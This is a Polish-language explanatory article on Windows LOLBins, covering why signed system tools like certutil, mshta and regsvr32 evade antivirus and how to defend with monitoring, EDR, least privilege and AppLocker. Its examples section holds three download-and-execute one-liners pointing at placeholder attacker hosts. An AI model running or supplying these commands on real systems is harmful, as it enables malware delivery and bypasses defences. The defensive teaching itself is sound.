Living off the Land Binaries (LOLBins): Wykorzystanie natywnych narzędzi Windows do ataków
🛠️ Living off the Land Binaries (LOLBins): Wykorzystanie natywnych narzędzi Windows do ataków
🔍 Czym są LOLBins?
Living off the Land Binaries (LOLBins) to legalne, preinstalowane pliki wykonywalne w systemie Windows, które mogą zostać wykorzystane przez cyberprzestępców do przeprowadzania ataków bez potrzeby pobierania dodatkowego złośliwego oprogramowania. Atakujący używają ich do ukrycia aktywności, ominięcia zabezpieczeń oraz eskalacji uprawnień.
Przykładami takich plików są:
powershell.execertutil.exebitsadmin.exeregsvr32.exemshta.exe
🎯 Dlaczego LOLBins są niebezpieczne?
🔐 Zaufanie systemowe: Są podpisane cyfrowo przez Microsoft i traktowane jako bezpieczne.
🛡️ Omijanie AV/EDR: Nie są traktowane jako podejrzane przez większość programów antywirusowych i systemów wykrywania zagrożeń.
📂 Brak potrzeby zewnętrznych plików: Nie wymagają pobierania dodatkowych narzędzi – można działać w pełni „wewnątrz” systemu.

⚔️ Przykłady wykorzystania LOLBins
🧪 certutil.exe
To narzędzie do zarządzania certyfikatami, ale może być używane do pobierania złośliwego kodu:
certutil.exe -urlcache -split -f http://adres_atakującego/malware.exe malware.exe
🖥️ mshta.exe
Umożliwia uruchamianie skryptów HTML/JS:
mshta.exe http://adres_atakującego/złośliwy_skript.hta
💾 regsvr32.exe
Może rejestrować złośliwe biblioteki DLL zdalnie:
regsvr32.exe /s /n /u /i:http://adres/złośliwy.sct scrobj.dll
🛡️ Jak się chronić przed atakami typu LOLBins?
✅ 1. Monitorowanie użycia nietypowych narzędzi systemowych
- Loguj i analizuj działania PowerShell, WMI,
certutil.exeiregsvr32.exe. - Używaj Windows Event Log + Sysmon.
✅ 2. Wdrażanie narzędzi EDR/XDR
Nowoczesne systemy detekcji są świadome technik LOLBins i potrafią identyfikować ich nadużycie.
✅ 3. Ograniczenie uprawnień użytkowników
- Używaj zasady najmniejszych uprawnień (Least Privilege).
- Wyłącz niepotrzebne funkcje PowerShell i skrypty HTA.
✅ 4. Blokowanie na poziomie GPO lub AppLocker
Można zdefiniować reguły, które ograniczą uruchamianie niektórych narzędzi przez zwykłych użytkowników.
💡 LOLBins a techniki „Living off the Land” (LotL)
Techniki LOLBins to tylko jeden z elementów większego trendu – Living off the Land – w którym atakujący korzystają z zasobów dostępnych lokalnie na maszynie ofiary, by nie wzbudzać podejrzeń.
📌 Podsumowanie
LOLBins to groźna i trudna do wykrycia technika wykorzystywana przez zaawansowanych cyberprzestępców. Ochrona przed tego typu zagrożeniami wymaga proaktywnego monitorowania, wiedzy o możliwych nadużyciach oraz wdrożenia polityk ograniczających użycie systemowych narzędzi.






